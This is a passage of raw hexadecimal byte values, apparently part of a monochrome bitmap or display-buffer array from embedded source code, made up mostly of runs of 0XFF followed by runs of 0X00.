0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X01,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X07,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X07,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X03,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X03,0XFF,0XFF,
0XFF,0XFF,0XF0,0X00,0X03,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XF8,0X00,0X03,0XE0,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
